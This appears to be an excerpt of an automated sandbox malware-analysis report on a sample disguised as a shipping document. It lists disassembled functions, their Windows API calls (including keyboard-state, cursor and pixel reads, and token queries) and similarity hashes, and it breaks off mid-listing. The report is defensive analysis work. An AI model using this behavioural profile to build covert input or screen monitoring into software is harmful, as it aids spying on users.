                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0099E61F
                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0099E648
                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0099E687
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0099E6AC
                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0099E6B4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 1389676194-0
                                                                • Opcode ID: cd254cfe182e980ec9e977da872a9b11a53b154e24a3f46ac1b506b46006f0f7
                                                                • Instruction ID: 3457247128ba96cddb1e9b6ca4f5b5e2cdced94eff3c9af404e7730f8d4c9fe5
                                                                • Opcode Fuzzy Hash: cd254cfe182e980ec9e977da872a9b11a53b154e24a3f46ac1b506b46006f0f7
                                                                • Instruction Fuzzy Hash: 4651EA39A00105DFCB01EF69C985AADBBF5EF89314F1480A5E819AB361CB71ED15DF50
                                                                Function 009BA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce2f7fba934001f341c119aae7e2e7ac835cbbe48236adc15c9341c1fc99fd52
                                                                • Instruction ID: 1ecb24cb006fad8f2528adac96f760b64e931d13085681da21743e41c7e085bb
                                                                • Opcode Fuzzy Hash: ce2f7fba934001f341c119aae7e2e7ac835cbbe48236adc15c9341c1fc99fd52
                                                                • Instruction Fuzzy Hash: CB41D33590C104AFD760DF2CCE98FE9BBA8EB09330F154665F916A72E0C770AD41EA61
                                                                Function 00932344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCursorPos.USER32(?), ref: 00932357
                                                                • ScreenToClient.USER32(009F57B0,?), ref: 00932374
                                                                • GetAsyncKeyState.USER32(00000001), ref: 00932399
                                                                • GetAsyncKeyState.USER32(00000002), ref: 009323A7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AsyncState$ClientCursorScreen
                                                                • String ID:
                                                                • API String ID: 4210589936-0
                                                                • Opcode ID: 3203fd89d5b7a2b6949b433af9bdc7adcbce1e5d68b408e564f91b2ac8d9276c
                                                                • Instruction ID: e8d2a0fe4ab6712c1c5208cc21db01c1c2d9303c09b03034bb87c0634dc8bd92
                                                                • Opcode Fuzzy Hash: 3203fd89d5b7a2b6949b433af9bdc7adcbce1e5d68b408e564f91b2ac8d9276c
                                                                • Instruction Fuzzy Hash: 7A418275608119FBCF299F68CC44BE9BB78FB05760F20435AF829962A0C734AD90DF91
                                                                Function 009863AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009863E7
                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00986433
                                                                • TranslateMessage.USER32(?), ref: 0098645C
                                                                • DispatchMessageW.USER32(?), ref: 00986466
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00986475
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                • String ID:
                                                                • API String ID: 2108273632-0
                                                                • Opcode ID: 6114384d8db6b7629036eeecc0af07260f7689a03ddfb40f55bd65c18aa69480
                                                                • Instruction ID: 55f3f5447faf038a4bf96fe928780bdafbc43cb864f47841885d9ffd0cab6684
                                                                • Opcode Fuzzy Hash: 6114384d8db6b7629036eeecc0af07260f7689a03ddfb40f55bd65c18aa69480
                                                                • Instruction Fuzzy Hash: B331D631914646EFDB24EFB4DC44FFABBACAB01310F15026AE521CB2B0E7359445E760
                                                                Function 00988A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowRect.USER32(?,?), ref: 00988A30
                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00988ADA
                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00988AE2
                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00988AF0
                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00988AF8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessagePostSleep$RectWindow
                                                                • String ID:
                                                                • API String ID: 3382505437-0
                                                                • Opcode ID: 01b95f6290dcdf98eeca82dfd5ef54d34151feb7d08abf616d67803abaed1f9f
                                                                • Instruction ID: 84f34adbfba7951833f353f372d7030dfb9423005ab074f6c7458074588fe4e5
                                                                • Opcode Fuzzy Hash: 01b95f6290dcdf98eeca82dfd5ef54d34151feb7d08abf616d67803abaed1f9f
                                                                • Instruction Fuzzy Hash: 7631C271504219EBDF14DFA8DD4DA9F3BB9EB04325F108629F925E62D0C7B09914DBA0
                                                                Function 0098B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0098B204
                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0098B221
                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0098B259
                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0098B27F
                                                                • _wcsstr.LIBCMT ref: 0098B289
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                • String ID:
                                                                • API String ID: 3902887630-0
                                                                • Opcode ID: cbb0771f30f353435684b0d116fed0bbab24df91941ff42d7ccdd955de5f446b
                                                                • Instruction ID: 732bd9b986b554d8e806a6082f97f83ebb55b90c24026b8689e4d13d2004e427
                                                                • Opcode Fuzzy Hash: cbb0771f30f353435684b0d116fed0bbab24df91941ff42d7ccdd955de5f446b
                                                                • Instruction Fuzzy Hash: 0F21F532604204BBEB25AB799C09E7F7B9CDF99760F144129FC09DA2A1EB659C409760
                                                                Function 009BB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009BB192
                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 009BB1B7
                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 009BB1CF
                                                                • GetSystemMetrics.USER32(00000004), ref: 009BB1F8
                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,009A0E90,00000000), ref: 009BB216
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Long$MetricsSystem
                                                                • String ID:
                                                                • API String ID: 2294984445-0
                                                                • Opcode ID: 1b3b74d506ee215d9ba4e5eb38e10d45a852e23f3f45b78ef4a321c9e8756206
                                                                • Instruction ID: e47747481a4b9f1158e57c29db6631a088169984f8776c5e4463c8659a572d42
                                                                • Opcode Fuzzy Hash: 1b3b74d506ee215d9ba4e5eb38e10d45a852e23f3f45b78ef4a321c9e8756206
                                                                • Instruction Fuzzy Hash: C8219171928655AFCB209F38DD14AAA3BA8FB15771F114B28F932D71E0E7709910DB90
                                                                Function 00989307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00989320
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00989352
                                                                • __itow.LIBCMT ref: 0098936A
                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00989392
                                                                • __itow.LIBCMT ref: 009893A3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$__itow$_memmove
                                                                • String ID:
                                                                • API String ID: 2983881199-0
                                                                • Opcode ID: 790cb651bffd0b1ccb39cd94c8131a1df2ed769086b78ba10758229ac3543abd
                                                                • Instruction ID: 47cdb049bd89dc422ee803353d065cdb7fc47135c056ea742253a9aa29354612
                                                                • Opcode Fuzzy Hash: 790cb651bffd0b1ccb39cd94c8131a1df2ed769086b78ba10758229ac3543abd
                                                                • Instruction Fuzzy Hash: 2921C831704208BBDB20BAA58C85FBE7BADEB89714F084026FD45E72D1D6B08D459B91
                                                                Function 009A5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWindow.USER32(00000000), ref: 009A5A6E
                                                                • GetForegroundWindow.USER32 ref: 009A5A85
                                                                • GetDC.USER32(00000000), ref: 009A5AC1
                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 009A5ACD
                                                                • ReleaseDC.USER32(00000000,00000003), ref: 009A5B08
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$ForegroundPixelRelease
                                                                • String ID:
                                                                • API String ID: 4156661090-0
                                                                • Opcode ID: 3cfb1b0d2e8c57c35b2548ad0caf684a25a9829ae242d5dbe912404ae49e4e71
                                                                • Instruction ID: 5a2c565ba7a84ca3a704c716c60bfed2ba621c4368ea679731644954b5f9a514
                                                                • Opcode Fuzzy Hash: 3cfb1b0d2e8c57c35b2548ad0caf684a25a9829ae242d5dbe912404ae49e4e71
                                                                • Instruction Fuzzy Hash: 8C218135A00504EFDB14EFA9DD94B9ABBF5EF89310F148579F80997362CA70AD01DB90
                                                                Function 009312F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0093134D
                                                                • SelectObject.GDI32(?,00000000), ref: 0093135C
                                                                • BeginPath.GDI32(?), ref: 00931373
                                                                • SelectObject.GDI32(?,00000000), ref: 0093139C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                • String ID:
                                                                • API String ID: 3225163088-0
                                                                • Opcode ID: 177b06b8484c275fa861073ef4db8ee57e13eed404659955910c59403c043d67
                                                                • Instruction ID: 3a33b9db52ed7929e5b559e323b0c83f3a0d68bceb2a54f3c85effb3cbdd2603
                                                                • Opcode Fuzzy Hash: 177b06b8484c275fa861073ef4db8ee57e13eed404659955910c59403c043d67
                                                                • Instruction Fuzzy Hash: 45217C30828B08EFDB10DF29ED047B97BA8FB003A5F154226F920961B0D7719C95EF91
                                                                Function 0098BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memcmp
                                                                • String ID:
                                                                • API String ID: 2931989736-0
                                                                • Opcode ID: cacd78629bda4d9d52ec9564bd60deeb365a61037b8e918e2c353d51dc1bbec4
                                                                • Instruction ID: a098669f8e2165e4bb9d038585f799a209139acad195d363896e04360ba18218
                                                                • Opcode Fuzzy Hash: cacd78629bda4d9d52ec9564bd60deeb365a61037b8e918e2c353d51dc1bbec4
                                                                • Instruction Fuzzy Hash: 0901B5B26402057BD204BB169D52FBBB35CDEA1388B084425FD4597382EB54EE1583A1
                                                                Function 00994A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 00994ABA
                                                                • __beginthreadex.LIBCMT ref: 00994AD8
                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00994AED
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00994B03
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00994B0A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                • String ID:
                                                                • API String ID: 3824534824-0
                                                                • Opcode ID: 42a6d10d609699d0d7ccff82188d6d691f7cd9e72303df15facbc7d5688f9b01
                                                                • Instruction ID: dc00cdd2ac9578ecd4850740d776ae26c07c589f3174cbee1a0d7d91914b279d
                                                                • Opcode Fuzzy Hash: 42a6d10d609699d0d7ccff82188d6d691f7cd9e72303df15facbc7d5688f9b01
                                                                • Instruction Fuzzy Hash: F611047691D608BBCB018FACAC08EEF7FACEB49320F154369F924D3260D671C90497A0
                                                                Function 00988202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0098821E
                                                                • GetLastError.KERNEL32(?,00987CE2,?,?,?), ref: 00988228
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00987CE2,?,?,?), ref: 00988237
                                                                • HeapAlloc.KERNEL32(00000000,?,00987CE2,?,?,?), ref: 0098823E
                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00988255
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 842720411-0
                                                                • Opcode ID: 2ec05eec5ba1069a82947bd9b298aa4c1ccdaebcbcd4d6e4a3c8f762128cf338
                                                                • Instruction ID: 651268e69381b4020a0bcf6aae1060d1499ea23ed425cf3e4d475fa4fce07cb1
                                                                • Opcode Fuzzy Hash: 2ec05eec5ba1069a82947bd9b298aa4c1ccdaebcbcd4d6e4a3c8f762128cf338
                                                                • Instruction Fuzzy Hash: EF0162B1214604FFDB105FA9DD58D677BACEF857A47500529F819C2220DA318C00DB70
                                                                Function 0098710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?,?,00987455), ref: 00987127
                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 00987142
                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 00987150
                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?), ref: 00987160
                                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 0098716C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                • String ID:
                                                                • API String ID: 3897988419-0
                                                                • Opcode ID: 2343eefcf937fc8b6a20785999d5d7b384d942238054ae134c9e021ba1f392cf
                                                                • Instruction ID: af26c381626598dfac9ab48ba3e609df8460d66de380ac898c485d16ea97ab60
                                                                • Opcode Fuzzy Hash: 2343eefcf937fc8b6a20785999d5d7b384d942238054ae134c9e021ba1f392cf
                                                                • Instruction Fuzzy Hash: 7D018472619208BBDB119FA4DD88BAABBEDEF447A1F240164FD06D2310D731DD4097A0
                                                                Function 00995244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00995260
                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0099526E
                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00995276
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00995280
                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009952BC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                • String ID:
                                                                • API String ID: 2833360925-0
                                                                • Opcode ID: 0b85e24de812e7a59090dc952b33bd22b78bb9b76b3ae6dc7e8935329eb09eeb
                                                                • Instruction ID: 191042ff43921aabbb1e69846712b98f099ae87cdf4bc37546d832b78e6bd645
                                                                • Opcode Fuzzy Hash: 0b85e24de812e7a59090dc952b33bd22b78bb9b76b3ae6dc7e8935329eb09eeb
                                                                • Instruction Fuzzy Hash: 5F016931D19A1DDBCF00EFE8ED58AEEBB78FB09721F420566E951F2240CB3055509BA1
                                                                Function 0098810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00988121
                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0098812B
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0098813A
                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00988141
